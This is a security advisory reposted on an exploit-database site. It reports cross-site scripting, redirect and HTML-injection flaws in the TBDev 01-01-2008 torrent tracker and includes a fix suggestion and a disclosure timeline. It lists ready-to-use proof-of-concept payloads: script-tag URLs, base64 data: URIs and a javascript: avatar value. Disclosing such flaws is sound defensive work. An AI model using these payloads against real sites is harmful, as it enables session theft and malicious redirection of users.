0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
TBDev 01-01-2008 Multiple Remote Vulnerabilities
[================================================ TBDev 01-01-2008 Multiple Remote Vulnerabilities ================================================ TBDev - Cross Site Scripting and HTML Injection Vulnerabilities Version Affected: 01-01-2008 (16th January 2008) (newest) Info: TBDEV.NET is a project to further enhance, update and develop a software (php peer-to-peer) from the original torrentbits/bytemonsoon source code. Credits: InterN0T External Links: http://www.tbdev.net -:: The Advisory ::- Vulnerable Function / ID Calls: returnto Cross Site Scripting: (Sysops / Mods Only!) http://[HOST]/tbdev/tbdev-01-01-08/makepoll.php?returnto=><script>alert(0)</script> http://[HOST]/tbdev/tbdev-01-01-08/polls.php?action=delete&pollid=1&returnto=><script>alert(0)</script><br Cross Site Script Redirection: (Sysops / Mods Only!) http://[HOST]/tbdev/tbdev-01-01-08/news.php?action=delete&newsid=1&returnto=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&sure=1 Cross Site Script Redirection: (Anyone, the enduser will need to log in though) http://[HOST]/tbdev/tbdev-01-01-08/login.php?returnto=http://[HOST] http://[HOST]/tbdev/tbdev-01-01-08/login.php?returnto=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K HTML Injection: 1) http://[HOST]/tbdev/tbdev-01-01-08/my.php -- Info field: </textarea><script>alert(0)</script> << is reflected locally only! 2) http://[HOST]/tbdev/tbdev-01-01-08/my.php -- Avatar field: javascript:alert(0) 2b) Affected Sites by HTML Injection: http://[HOST]/tbdev/tbdev-01-01-08/userdetails.php?id=USERID Internet Explorer 6 and perhaps 7 should be triggered by this. Please see: http://ha.ckers.org/xss.html for more information. Browser Tested: Internet Explorer 7 (FireFox 3 was tested for the other vulnerabilities) -:: Solution ::- Secure redirection calls with referer headers (just an example) and filter bad characters. Conclusion: This system was fun to find bad code in, it sure had a nice diversity of vulnerabilities. Reference: http://forum.intern0t.net/intern0t-advisories/1121-intern0t-tbdev-01-01-2008-multiple-vulnerabilities.html Disclosure Information: - Vulnerabilities found, researched and confirmed between 5th to 10th June. - Advisory finished and published on InterN0T the 12th June. - Vendor and Buqtraq (SecurityFocus) contacted the 12th June. All of the best, MaXe # 0day.today [2024-10-06] #